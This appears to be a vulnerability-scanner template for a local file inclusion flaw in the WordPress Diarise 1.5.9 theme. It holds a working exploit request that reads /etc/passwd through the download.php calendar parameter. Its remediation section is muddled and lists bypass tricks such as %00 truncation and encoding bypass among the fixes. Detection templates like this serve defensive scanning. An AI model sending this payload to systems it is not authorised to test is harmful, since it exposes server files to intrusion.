id: Wordpress-Diarise_Plugins-LFI
info:
  name: WordPress Diarise 1.5.9 local files include
  author:
  - l0ne1y
  description: |-
    WordPress Theme Diarise 1.5.9 local file contains vulnerability
    WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an application plugin.

    WordPress Diarise 1.5.9 has a path traversal vulnerability that allows remote attackers to conduct file inclusion attacks via the calendar parameter.
  severity: critical
  remediation: "Official repair plan:\\n1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/Diarise\n\\n\\nTemporary fix:\\n1. Use open_basedir configuration in PHP to restrict access to the specified area, path length truncation\\n2. Filter. (dot)/(backslash)\\\\\\\\(backslash), encoding bypass\\n3. Disable server remote file inclusion\\n4. For the case where the included file suffix is restricted, the PHP version is less than 5.3, php.ini\nmagic_quotes_gpc = off, the addslashes function is not used for controllable parameters, and %00 truncation can be used if these three conditions are met. \\n5. Question mark, pound sign, and space bypass (remote)"
requests:
- matchers:
  - type: dsl
    dsl:
    - ' contains(body,"root:x:") && status_code==200 '
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd'
  method: GET
